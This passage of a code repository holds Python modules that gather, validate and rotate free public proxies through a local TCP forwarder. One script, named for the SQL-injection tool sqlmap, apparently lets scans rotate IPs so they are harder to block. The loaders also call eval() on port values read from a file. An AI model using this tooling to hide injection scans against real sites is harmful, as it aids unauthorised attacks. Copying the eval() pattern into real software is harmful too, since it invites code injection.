file_handler.setLevel(self.level) 73 | else: 74 | file_handler.setLevel(level) 75 | formatter = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s') 76 | 77 | file_handler.setFormatter(formatter) 78 | self.file_handler = file_handler 79 | self.addHandler(file_handler) 80 | 81 | def __setStreamHandler__(self, level=None): 82 | """ 83 | set stream handler 84 | :param level: 85 | :return: 86 | """ 87 | stream_handler = logging.StreamHandler() 88 | formatter = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s') 89 | stream_handler.setFormatter(formatter) 90 | if not level: 91 | stream_handler.setLevel(self.level) 92 | else: 93 | stream_handler.setLevel(level) 94 | self.addHandler(stream_handler) 95 | 96 | 97 | if __name__ == '__main__': 98 | log = LogHandler('test') 99 | log.info('this is a test msg') -------------------------------------------------------------------------------- /Proxy/handler/proxyHandler.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # from hutaow 3 | import sys 4 | import socket 5 | import logging 6 | import threading 7 | import random 8 | local_ip = '127.0.0.1' 9 | local_port = 10086 10 | PKT_BUFF_SIZE = 2048 11 | #日志设置 12 | logger = logging.getLogger("Proxy Logging") 13 | formatter = logging.Formatter('%(name)-12s %(asctime)s %(levelname)-8s %(lineno)-4d %(message)s', '%Y %b %d %a %H:%M:%S',) 14 | stream_handler = logging.StreamHandler(sys.stderr) 15 | stream_handler.setFormatter(formatter) 16 | logger.addHandler(stream_handler) 17 | logger.setLevel(logging.DEBUG) 18 | 19 | def tcp_mapping_worker(conn_receiver, conn_sender): 20 | while True: 21 | try: 22 | data = conn_receiver.recv(PKT_BUFF_SIZE) 23 | except Exception: 24 | print('Connection closed.') 25 | break 26 | if not data: 27 | print('No more data is received.') 28 | break 29 | try: 30 | conn_sender.sendall(data) 31 | except Exception: 32 | print('Failed sending data.') 33 | break 34 | print('Mapping > %s -> %s > %d bytes.' % (conn_receiver.getpeername(), conn_sender.getpeername(), len(data))) 35 | conn_receiver.close() 36 | conn_sender.close() 37 | return 38 | 39 | def tcp_mapping_request(local_conn, remote_ip, remote_port): 40 | 41 | while True: 42 | remote_conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 43 | try: 44 | remote_conn.settimeout(3) 45 | remote_conn.connect((remote_ip, remote_port)) 46 | except Exception: 47 | print('Unable to connect to the remote server.') 48 | continue 49 | threading.Thread(target=tcp_mapping_worker, args=(local_conn, remote_conn)).start() 50 | threading.Thread(target=tcp_mapping_worker, args=(remote_conn, local_conn)).start() 51 | return 52 | 53 | def switchPro(proxylist): 54 | local_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 55 | local_server.bind((local_ip, local_port)) 56 | local_server.listen(5) 57 | #logger.debug('Starting mapping service on ' + local_ip + ':' + str(local_port) + ' ...') 58 | print('Starting mapping service on ' + local_ip + ':' + str(local_port) + ' ...') 59 | 60 | while True: 61 | try: 62 | (local_conn, local_addr) = local_server.accept() 63 | proxyip = random.choice(proxylist) 64 | print("[!]Now proxy ip:"+str(proxyip)) 65 | prip, prpo = proxyip.split(":") 66 | except Exception: 67 | local_server.close() 68 | print('Stop mapping service.') 69 | #logger.debug('Stop mapping service.') 70 | break 71 | threading.Thread(target=tcp_mapping_request, args=(local_conn, prip, prpo)).start() 72 | print('Receive mapping request from %s:%d.' % local_addr) 73 | 74 | 75 | def Loadips(): 76 | ip_list = [] 77 | ip = ['ip','port'] 78 | with open('ips.txt') as ips: 79 | lines = ips.readlines() 80 | for line in lines: 81 | ip[0],ip[1] = line.strip().split(":") 82 | ip[1] = eval(ip[1]) 83 | nip = tuple(ip) 84 | ip_list.append(nip) 85 | return ip_list 86 | 87 | if __name__ == '__main__': 88 | a = Loadips() 89 | print(a) 90 | local_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 91 | local_server.bind((local_ip, local_port)) 92 | local_server.listen(5) 93 | logger.debug('Starting mapping service on ' + local_ip + ':' + str(local_port) + ' ...') 94 | while True: 95 | try: 96 | (local_conn, local_addr) = local_server.accept() 97 | proxyip = random.choice(a) 98 | print("[!]Now proxy ip:"+str(proxyip)) 99 | prip = proxyip[0] 100 | prpo= proxyip[1] 101 | except Exception: 102 | local_server.close() 103 | logger.debug('Stop mapping service.') 104 | break 105 | threading.Thread(target=tcp_mapping_request, args=(local_conn, prip, prpo)).start() 106 | logger.debug('Receive mapping request from %s:%d.' % local_addr) -------------------------------------------------------------------------------- /Proxy/helper/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__init__.py -------------------------------------------------------------------------------- /Proxy/helper/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /Proxy/helper/__pycache__/check.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__pycache__/check.cpython-37.pyc -------------------------------------------------------------------------------- /Proxy/helper/__pycache__/proxy.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__pycache__/proxy.cpython-37.pyc -------------------------------------------------------------------------------- /Proxy/helper/__pycache__/validator.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__pycache__/validator.cpython-37.pyc -------------------------------------------------------------------------------- /Proxy/helper/check.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: check 5 | Description : 执行代理校验 6 | Author : JHao 7 | date: 2019/8/6 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2019/08/06: 执行代理校验 11 | 2021/05/25: 分别校验http和https 12 | ------------------------------------------------- 13 | """ 14 | __author__ = 'JHao' 15 | 16 | from Proxy.util.six import Empty 17 | from threading import Thread 18 | from datetime import datetime 19 | from Proxy.handler.logHandler import LogHandler 20 | from Proxy.helper.validator import ProxyValidator 21 | from Proxy.handler.configHandler import ConfigHandler 22 | import threading 23 | 24 | class DoValidator(object): 25 | """ 执行校验 """ 26 | 27 | @classmethod 28 | def validator(cls, proxy): 29 | """ 30 | 校验入口 31 | Args: 32 | proxy: Proxy Object 33 | Returns: 34 | Proxy Object 35 | """ 36 | http_r = cls.httpValidator(proxy) 37 | https_r = False if not http_r else cls.httpsValidator(proxy) 38 | 39 | proxy.check_count += 1 40 | proxy.last_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S") 41 | proxy.last_status = True if http_r else False 42 | if http_r: 43 | if proxy.fail_count > 0: 44 | proxy.fail_count -= 1 45 | proxy.https = True if https_r else False 46 | else: 47 | proxy.fail_count += 1 48 | return proxy 49 | 50 | @classmethod 51 | def http_or_https(cls, proxy, anonymous=False): 52 | if anonymous: 53 | cls.anonymousValidator(proxy) 54 | else: 55 | if 'HTTPS' in proxy.https or '支持' in proxy.https: 56 | cls.httpsValidator(proxy) 57 | else: 58 | cls.httpValidator(proxy) 59 | @classmethod 60 | def httpValidator(cls, proxy): 61 | for func in ProxyValidator.http_validator: 62 | if not func(proxy): 63 | proxy.last_status = None 64 | return False 65 | proxy._https = 'HTTP' 66 | return True 67 | 68 | @classmethod 69 | def httpsValidator(cls, proxy): 70 | for func in ProxyValidator.https_validator: 71 | if not func(proxy): 72 | proxy.last_status = None 73 | return False 74 | proxy._https = 'HTTPS' 75 | return True 76 | 77 | @classmethod 78 | def preValidator(cls, proxy): 79 | for func in ProxyValidator.pre_validator: 80 | if not func(proxy): 81 | proxy.last_status = None 82 | return False 83 | return True 84 | 85 | @classmethod 86 | def anonymousValidator(cls, proxy): 87 | for func in ProxyValidator.anonymous_validator: 88 | if not func(proxy): 89 | proxy.last_status = None 90 | proxy._anonymous = '透明' 91 | return False 92 | proxy._anonymous = '高匿' 93 | return True 94 | 95 | 96 | class _ThreadChecker(Thread): 97 | threadLock = threading.Lock() 98 | temp_list = [] 99 | """ 多线程检测 """ 100 | 101 | def __init__(self, work_type, target_queue, thread_name): 102 | Thread.__init__(self, name=thread_name) 103 | self.work_type = work_type 104 | self.log = LogHandler("checker") 105 | #self.proxy_handler = ProxyHandler() 106 | self.target_queue = target_queue 107 | self.conf = ConfigHandler() 108 | 109 | def run(self): 110 | self.log.info("{}ProxyCheck - {}: start".format(self.work_type.title(), self.name)) 111 | while True: 112 | try: 113 | proxy = self.target_queue.get(block=False) 114 | except Empty: 115 | self.log.info("{}ProxyCheck - {}: complete".format(self.work_type.title(), self.name)) 116 | break 117 | proxy = DoValidator.validator(proxy) 118 | 119 | if proxy.last_status or proxy.https: 120 | self.log.info('RawProxyCheck - {}: {} pass'.format(self.name, proxy.proxy.ljust(23))) 121 | _ThreadChecker.temp_list.append(proxy.proxy) 122 | else: 123 | self.log.info('RawProxyCheck - {}: {} fail'.format(self.name, proxy.proxy.ljust(23))) 124 | 125 | #if self.work_type == "raw": 126 | # self.__ifRaw(proxy) 127 | #else: 128 | # self.__ifUse(proxy) 129 | self.target_queue.task_done() 130 | 131 | #def __ifRaw(self, proxy): 132 | # if proxy.last_status: 133 | # if self.proxy_handler.exists(proxy): 134 | # self.log.info('RawProxyCheck - {}: {} exist'.format(self.name, proxy.proxy.ljust(23))) 135 | # else: 136 | # self.log.info('RawProxyCheck - {}: {} pass'.format(self.name, proxy.proxy.ljust(23))) 137 | # self.proxy_handler.put(proxy) 138 | # else: 139 | # self.log.info('RawProxyCheck - {}: {} fail'.format(self.name, proxy.proxy.ljust(23))) 140 | 141 | #def __ifUse(self, proxy): 142 | # if proxy.last_status: 143 | # self.log.info('UseProxyCheck - {}: {} pass'.format(self.name, proxy.proxy.ljust(23))) 144 | # self.proxy_handler.put(proxy) 145 | # else: 146 | # if proxy.fail_count > self.conf.maxFailCount: 147 | # self.log.info('UseProxyCheck - {}: {} fail, count {} delete'.format(self.name, 148 | # proxy.proxy.ljust(23), 149 | # proxy.fail_count)) 150 | # self.proxy_handler.delete(proxy) 151 | # else: 152 | # self.log.info('UseProxyCheck - {}: {} fail, count {} keep'.format(self.name, 153 | # proxy.proxy.ljust(23), 154 | # proxy.fail_count)) 155 | # self.proxy_handler.put(proxy) 156 | 157 | def Checker(tp='raw', queue=None): 158 | """ 159 | run Proxy ThreadChecker 160 | :param tp: raw/use 161 | :param queue: Proxy Queue 162 | :return: 163 | """ 164 | thread_list = list() 165 | for index in range(20): 166 | thread_list.append(_ThreadChecker(tp, queue, "thread_%s" % str(index).zfill(2))) 167 | 168 | for thread in thread_list: 169 | thread.setDaemon(True) 170 | thread.start() 171 | 172 | for thread in thread_list: 173 | thread.join() 174 | 175 | return _ThreadChecker.temp_list -------------------------------------------------------------------------------- /Proxy/helper/fetch.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: fetchScheduler 5 | Description : 6 | Author : JHao 7 | date: 2019/8/6 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2019/08/06: 11 | ------------------------------------------------- 12 | """ 13 | __author__ = 'JHao' 14 | 15 | from Proxy.helper.proxy import Proxy 16 | from Proxy.helper.check import DoValidator 17 | from Proxy.handler.logHandler import LogHandler 18 | #from Proxy.handler.proxyHandler import ProxyHandler 19 | from Proxy.proxyFetcher import ProxyFetcher 20 | from Proxy.handler.configHandler import ConfigHandler 21 | 22 | 23 | class Fetcher(object): 24 | name = "fetcher" 25 | 26 | def __init__(self): 27 | self.log = LogHandler(self.name) 28 | self.conf = ConfigHandler() 29 | #self.proxy_handler = ProxyHandler() 30 | 31 | def run(self): 32 | """ 33 | fetch proxy with proxyFetcher 34 | :return: 35 | """ 36 | proxy_dict = dict() 37 | self.log.info("ProxyFetch : start") 38 | for fetch_source in self.conf.fetchers: 39 | self.log.info("ProxyFetch - {func}: start".format(func=fetch_source)) 40 | fetcher = getattr(ProxyFetcher, fetch_source, None) 41 | if not fetcher: 42 | self.log.error("ProxyFetch - {func}: class method not exists!".format(func=fetch_source)) 43 | continue 44 | if not callable(fetcher): 45 | self.log.error("ProxyFetch - {func}: must be class method".format(func=fetch_source)) 46 | continue 47 | 48 | try: 49 | for proxy in fetcher(): 50 | self.log.info('ProxyFetch - %s: %s ok' % (fetch_source, proxy.ljust(23))) 51 | proxy = proxy.strip() 52 | if proxy in proxy_dict: 53 | proxy_dict[proxy].add_source(fetch_source) 54 | else: 55 | proxy_dict[proxy] = Proxy(proxy, source=fetch_source) 56 | except Exception as e: 57 | self.log.error("ProxyFetch - {func}: error".format(func=fetch_source)) 58 | self.log.error(str(e)) 59 | self.log.info("ProxyFetch - all complete!") 60 | for _ in proxy_dict.values(): 61 | if DoValidator.preValidator(_.proxy): 62 | yield _ 63 | -------------------------------------------------------------------------------- /Proxy/helper/proxy.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: Proxy 5 | Description : 代理对象类型封装 6 | Author : JHao 7 | date: 2019/7/11 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2019/7/11: 代理对象类型封装 11 | ------------------------------------------------- 12 | """ 13 | __author__ = 'JHao' 14 | 15 | import json 16 | 17 | 18 | class Proxy(object): 19 | 20 | def __init__(self, proxy, fail_count=0, region="", anonymous="", 21 | source="", check_count=0, last_status="", last_time="", https=False): 22 | self._proxy = proxy 23 | self._fail_count = fail_count 24 | self._region = region 25 | self._anonymous = anonymous 26 | self._source = source.split('/') 27 | self._check_count = check_count 28 | self._last_status = last_status 29 | self._last_time = last_time 30 | self._https = https 31 | 32 | @classmethod 33 | def createFromJson(cls, proxy_json): 34 | _dict = json.loads(proxy_json) 35 | return cls(proxy=_dict.get("proxy", ""), 36 | fail_count=_dict.get("fail_count", 0), 37 | region=_dict.get("region", ""), 38 | anonymous=_dict.get("anonymous", ""), 39 | source=_dict.get("source", ""), 40 | check_count=_dict.get("check_count", 0), 41 | last_status=_dict.get("last_status", ""), 42 | last_time=_dict.get("last_time", ""), 43 | https=_dict.get("https", False) 44 | ) 45 | 46 | @property 47 | def proxy(self): 48 | """ 代理 ip:port """ 49 | return self._proxy 50 | 51 | @property 52 | def fail_count(self): 53 | """ 检测失败次数 """ 54 | return self._fail_count 55 | 56 | @property 57 | def region(self): 58 | """ 地理位置(国家/城市) """ 59 | return self._region 60 | 61 | @property 62 | def anonymous(self): 63 | """ 匿名 """ 64 | return self._anonymous 65 | 66 | @property 67 | def source(self): 68 | """ 代理来源 """ 69 | return '/'.join(self._source) 70 | 71 | @property 72 | def check_count(self): 73 | """ 代理检测次数 """ 74 | return self._check_count 75 | 76 | @property 77 | def last_status(self): 78 | """ 最后一次检测结果 True -> 可用; False -> 不可用""" 79 | return self._last_status 80 | 81 | @property 82 | def last_time(self): 83 | """ 最后一次检测时间 """ 84 | return self._last_time 85 | 86 | @property 87 | def https(self): 88 | """ 是否支持https """ 89 | return self._https 90 | 91 | @property 92 | def to_dict(self): 93 | """ 属性字典 """ 94 | return {"proxy": self.proxy, 95 | "https": self.https, 96 | "fail_count": self.fail_count, 97 | "region": self.region, 98 | "anonymous": self.anonymous, 99 | "source": self.source, 100 | "check_count": self.check_count, 101 | "last_status": self.last_status, 102 | "last_time": self.last_time} 103 | 104 | @property 105 | def to_json(self): 106 | """ 属性json格式 """ 107 | return json.dumps(self.to_dict, ensure_ascii=False) 108 | 109 | @fail_count.setter 110 | def fail_count(self, value): 111 | self._fail_count = value 112 | 113 | @check_count.setter 114 | def check_count(self, value): 115 | self._check_count = value 116 | 117 | @last_status.setter 118 | def last_status(self, value): 119 | self._last_status = value 120 | 121 | @last_time.setter 122 | def last_time(self, value): 123 | self._last_time = value 124 | 125 | @https.setter 126 | def https(self, value): 127 | self._https = value 128 | 129 | def add_source(self, source_str): 130 | if source_str: 131 | self._source.append(source_str) 132 | self._source = list(set(self._source)) 133 | -------------------------------------------------------------------------------- /Proxy/helper/validator.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: _validators 5 | Description : 定义proxy验证方法 6 | Author : JHao 7 | date: 2021/5/25 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2021/5/25: 11 | ------------------------------------------------- 12 | """ 13 | __author__ = 'JHao' 14 | 15 | from re import findall 16 | from requests import head,get 17 | from Proxy.util.six import withMetaclass 18 | from Proxy.util.singleton import Singleton 19 | from Proxy.handler.configHandler import ConfigHandler 20 | import json 21 | 22 | conf = ConfigHandler() 23 | 24 | HEADER = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 25 | 'Accept': '*/*', 26 | 'Connection': 'keep-alive', 27 | 'Accept-Language': 'zh-CN,zh;q=0.8'} 28 | 29 | 30 | class ProxyValidator(withMetaclass(Singleton)): 31 | pre_validator = [] 32 | http_validator = [] 33 | https_validator = [] 34 | anonymous_validator = [] 35 | 36 | @classmethod 37 | def addPreValidator(cls, func): 38 | cls.pre_validator.append(func) 39 | return func 40 | 41 | @classmethod 42 | def addHttpValidator(cls, func): 43 | cls.http_validator.append(func) 44 | return func 45 | 46 | @classmethod 47 | def addHttpsValidator(cls, func): 48 | cls.https_validator.append(func) 49 | return func 50 | 51 | @classmethod 52 | def addAnonymousValidator(cls, func): 53 | cls.anonymous_validator.append(func) 54 | return func 55 | 56 | 57 | @ProxyValidator.addPreValidator 58 | def formatValidator(proxy): 59 | """检查代理格式""" 60 | verify_regex = r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}" 61 | _proxy = findall(verify_regex, proxy) 62 | return True if len(_proxy) == 1 and _proxy[0] == proxy else False 63 | 64 | 65 | @ProxyValidator.addHttpValidator 66 | def httpTimeOutValidator(proxy): 67 | """ http检测超时 """ 68 | 69 | proxies = {"http": "http://{proxy}".format(proxy=proxy.proxy), "https": "https://{proxy}".format(proxy=proxy.proxy)} 70 | 71 | try: 72 | r = head(conf.httpUrl, headers=HEADER, proxies=proxies, timeout=conf.verifyTimeout) 73 | #r = get(conf.httpUrl, headers=HEADER, proxies=proxies, timeout=conf.verifyTimeout) 74 | #return True if r.status_code == 200 and ',' not in r.text else False 75 | return True if r.status_code == 200 else False 76 | except Exception as e: 77 | return False 78 | 79 | 80 | @ProxyValidator.addHttpsValidator 81 | def httpsTimeOutValidator(proxy): 82 | """https检测超时""" 83 | 84 | proxies = {"http": "http://{proxy}".format(proxy=proxy.proxy), "https": "https://{proxy}".format(proxy=proxy.proxy)} 85 | try: 86 | r = head(conf.httpsUrl, headers=HEADER, proxies=proxies, timeout=conf.verifyTimeout, verify=False) 87 | #r = get(conf.httpsUrl, headers=HEADER, proxies=proxies, timeout=conf.verifyTimeout, verify=False) 88 | #return True if r.status_code == 200 and ',' not in r.text else False 89 | return True if r.status_code == 200 else False 90 | except Exception as e: 91 | return False 92 | 93 | @ProxyValidator.addAnonymousValidator 94 | def customValidatorExample(proxy): 95 | """自定义validator函数,校验代理是否可用, 返回True/False""" 96 | """高匿代理检测""" 97 | proxies = {"http": "http://{proxy}".format(proxy=proxy.proxy), "https": "https://{proxy}".format(proxy=proxy.proxy)} 98 | try: 99 | r = get(conf.httpUrl, headers=HEADER, proxies=proxies, timeout=conf.verifyTimeout, verify=False) 100 | return True if r.status_code == 200 and ',' not in r.text else False 101 | #return True if r.status_code == 200 else False 102 | except Exception as e: 103 | return False 104 | #return True 105 | -------------------------------------------------------------------------------- /Proxy/ips.txt: -------------------------------------------------------------------------------- 1 | {"proxy": "47.57.188.208:80", "https": "HTTP", "anonymous": "\u900f\u660e"} 2 | {"proxy": "112.6.117.135:8085", "https": "HTTP", "anonymous": "\u9ad8\u533f"} 3 | {"proxy": "112.6.117.178:8085", "https": "HTTP", "anonymous": "\u9ad8\u533f"} 4 | {"proxy": "152.136.62.181:9999", "https": "HTTP", "anonymous": "\u9ad8\u533f\u540d"} 5 | {"proxy": "183.247.207.225:30001", "https": "HTTP", "anonymous": "\u9ad8\u533f\u540d"} 6 | -------------------------------------------------------------------------------- /Proxy/log/Apache Shiro: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/log/Apache Shiro -------------------------------------------------------------------------------- /Proxy/log/test.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/log/test.log -------------------------------------------------------------------------------- /Proxy/proxySetting.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: setting.py 5 | Description : 配置文件 6 | Author : JHao 7 | date: 2019/2/15 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2019/2/15: 11 | ------------------------------------------------- 12 | """ 13 | 14 | BANNER = r""" 15 | **************************************************************** 16 | *** ______ ********************* ______ *********** _ ******** 17 | *** | ___ \_ ******************** | ___ \ ********* | | ******** 18 | *** | |_/ / \__ __ __ _ __ _ | |_/ /___ * ___ | | ******** 19 | *** | __/| _// _ \ \ \/ /| | | || __// _ \ / _ \ | | ******** 20 | *** | | | | | (_) | > < \ |_| || | | (_) | (_) || |___ **** 21 | *** \_| |_| \___/ /_/\_\ \__ |\_| \___/ \___/ \_____/ **** 22 | **** __ / / ***** 23 | ************************* /___ / ******************************* 24 | ************************* ******************************** 25 | **************************************************************** 26 | """ 27 | 28 | VERSION = "2.3.0" 29 | 30 | # ############### server config ############### 31 | #HOST = "0.0.0.0" 32 | 33 | #PORT = 5010 34 | 35 | # ############### database config ################### 36 | # db connection uri 37 | # example: 38 | # Redis: redis://:password@ip:port/db 39 | # Ssdb: ssdb://:password@ip:port 40 | #DB_CONN = 'redis://:pwd@127.0.0.1:6379/0' 41 | 42 | # proxy table name 43 | #TABLE_NAME = 'use_proxy' 44 | 45 | 46 | # ###### config the proxy fetch function ###### 47 | #PROXY_FETCHER = [ 48 | # "freeProxy01", 49 | # "freeProxy02", 50 | # "freeProxy03", 51 | # # "freeProxy04", 52 | # "freeProxy05", 53 | # "freeProxy06", 54 | # "freeProxy07", 55 | # "freeProxy08", 56 | # "freeProxy09", 57 | # "freeProxy13", 58 | # "freeProxy14" 59 | #] 60 | 61 | # ############# proxy validator ################# 62 | # 代理验证目标网站 63 | HTTP_URL = "http://httpbin.org/ip" 64 | 65 | HTTPS_URL = "https://httpbin.org/ip" 66 | 67 | # 代理验证时超时时间 68 | VERIFY_TIMEOUT = 5 69 | 70 | # 近PROXY_CHECK_COUNT次校验中允许的最大失败次数,超过则剔除代理 71 | MAX_FAIL_COUNT = 0 72 | 73 | # 近PROXY_CHECK_COUNT次校验中允许的最大失败率,超过则剔除代理 74 | # MAX_FAIL_RATE = 0.1 75 | 76 | # proxyCheck时代理数量少于POOL_SIZE_MIN触发抓取 77 | POOL_SIZE_MIN = 20 78 | 79 | # ############# scheduler config ################# 80 | 81 | # Set the timezone for the scheduler forcely (optional) 82 | # If it is running on a VM, and 83 | # "ValueError: Timezone offset does not match system offset" 84 | # was raised during scheduling. 85 | # Please uncomment the following line and set a timezone for the scheduler. 86 | # Otherwise it will detect the timezone from the system automatically. 87 | 88 | TIMEZONE = "Asia/Shanghai" -------------------------------------------------------------------------------- /Proxy/sqlmap_auto_proxy.bat: -------------------------------------------------------------------------------- 1 | python3 sqlmap_auto_proxy.py 2 | pause -------------------------------------------------------------------------------- /Proxy/sqlmap_auto_proxy.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # from hutaow 3 | import sys 4 | import socket 5 | import logging 6 | import threading 7 | import random 8 | import json 9 | local_ip = '127.0.0.1' 10 | local_port = 9999 11 | PKT_BUFF_SIZE = 2048 12 | logger = logging.getLogger("Proxy Logging") 13 | formatter = logging.Formatter('%(name)-12s %(asctime)s %(levelname)-8s %(lineno)-4d %(message)s', '%Y %b %d %a %H:%M:%S',) 14 | stream_handler = logging.StreamHandler(sys.stderr) 15 | stream_handler.setFormatter(formatter) 16 | logger.addHandler(stream_handler) 17 | logger.setLevel(logging.DEBUG) 18 | def tcp_mapping_worker(conn_receiver, conn_sender): 19 | while True: 20 | if conn_receiver.fileno() == -1 or conn_sender.fileno() == -1: 21 | logger.debug('Socket has closed. ') 22 | return 23 | #if getattr(conn_receiver, '_closed') == True or getattr(conn_sender, '_closed') == True: 24 | try: 25 | data = conn_receiver.recv(PKT_BUFF_SIZE) 26 | except Exception as e: 27 | logger.debug('Connection closed. %s'%e) 28 | break 29 | if not data: 30 | logger.info('No more data is received.') 31 | break 32 | try: 33 | conn_sender.sendall(data) 34 | except Exception as e: 35 | logger.error('Failed sending data. %s'%e) 36 | break 37 | logger.info('Mapping > %s -> %s > %d bytes.' % (conn_receiver.getpeername(), conn_sender.getpeername(), len(data))) 38 | #else: 39 | #return 40 | conn_receiver.close() 41 | conn_sender.close() 42 | return 43 | 44 | def tcp_mapping_request(local_conn, remote_ip, remote_port): 45 | #切换IP次数 46 | retry_sock = 2 47 | #单个连接最大重试次数 48 | retry_count = 1 49 | while True: 50 | remote_conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 51 | try: 52 | remote_conn.settimeout(2) 53 | remote_conn.connect((remote_ip, remote_port)) 54 | except Exception: 55 | if retry_count > 0: 56 | logger.error('Unable to connect to the remote server. Number of retries remaining %s'%retry_count) 57 | retry_count -= 1 58 | continue 59 | elif retry_sock > 0: 60 | #重置重试次数 61 | retry_count = 1 62 | #切换IP次数减一 63 | retry_sock -= 1 64 | proxyip = random.choice(a) 65 | print("[!]Switch proxy ip:"+str(proxyip)) 66 | remote_ip = proxyip[0] 67 | remote_port= proxyip[1] 68 | continue 69 | else: 70 | #代理不稳定,建议切换 71 | logger.info('Proxy is not stability.') 72 | local_conn.close() 73 | remote_conn.close() 74 | return 75 | 76 | threading.Thread(target=tcp_mapping_worker, args=(local_conn, remote_conn)).start() 77 | threading.Thread(target=tcp_mapping_worker, args=(remote_conn, local_conn)).start() 78 | return 79 | 80 | def Loadips(): 81 | ip_list = [] 82 | ip = ['ip','port'] 83 | with open('ips.txt') as ips: 84 | lines = ips.readlines() 85 | for line in lines: 86 | proxy = json.loads(line.strip()).get("proxy", "") 87 | ip[0],ip[1] = proxy.split(":") 88 | ip[1] = eval(ip[1]) 89 | nip = tuple(ip) 90 | ip_list.append(nip) 91 | return ip_list 92 | 93 | a = Loadips() 94 | 95 | if __name__ == '__main__': 96 | print(a) 97 | local_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 98 | local_server.bind((local_ip, local_port)) 99 | local_server.listen(5) 100 | logger.debug('Starting mapping service on ' + local_ip + ':' + str(local_port) + ' ...') 101 | while True: 102 | try: 103 | (local_conn, local_addr) = local_server.accept() 104 | proxyip = random.choice(a) 105 | print("[!]Now proxy ip:"+str(proxyip)) 106 | prip = proxyip[0] 107 | prpo= proxyip[1] 108 | except Exception: 109 | local_server.close() 110 | logger.debug('Stop mapping service.') 111 | break 112 | threading.Thread(target=tcp_mapping_request, args=(local_conn, prip, prpo)).start() 113 | logger.debug('Receive mapping request from %s:%d.' % local_addr) -------------------------------------------------------------------------------- /Proxy/util/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: __init__ 5 | Description : 6 | Author : JHao 7 | date: 2020/7/6 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2020/7/6: 11 | ------------------------------------------------- 12 | """ 13 | __author__ = 'JHao' 14 | -------------------------------------------------------------------------------- /Proxy/util/lazyProperty.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: lazyProperty 5 | Description : 6 | Author : JHao 7 | date: 2016/12/3 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2016/12/3: 11 | ------------------------------------------------- 12 | """ 13 | __author__ = 'JHao' 14 | 15 | 16 | class LazyProperty(object): 17 | """ 18 | LazyProperty 19 | explain: http://www.spiderpy.cn/blog/5/ 20 | """ 21 | 22 | def __init__(self, func): 23 | self.func = func 24 | 25 | def __get__(self, instance, owner): 26 | if instance is None: 27 | return self 28 | else: 29 | value = self.func(instance) 30 | setattr(instance, self.func.__name__, value) 31 | return value 32 | -------------------------------------------------------------------------------- /Proxy/util/singleton.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: singleton 5 | Description : 6 | Author : JHao 7 | date: 2016/12/3 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2016/12/3: 11 | ------------------------------------------------- 12 | """ 13 | __author__ = 'JHao' 14 | 15 | 16 | class Singleton(type): 17 | """ 18 | Singleton Metaclass 19 | """ 20 | 21 | _inst = {} 22 | 23 | def __call__(cls, *args, **kwargs): 24 | if cls not in cls._inst: 25 | cls._inst[cls] = super(Singleton, cls).__call__(*args) 26 | return cls._inst[cls] 27 | -------------------------------------------------------------------------------- /Proxy/util/six.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: six 5 | Description : 6 | Author : JHao 7 | date: 2020/6/22 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2020/6/22: 11 | ------------------------------------------------- 12 | """ 13 | __author__ = 'JHao' 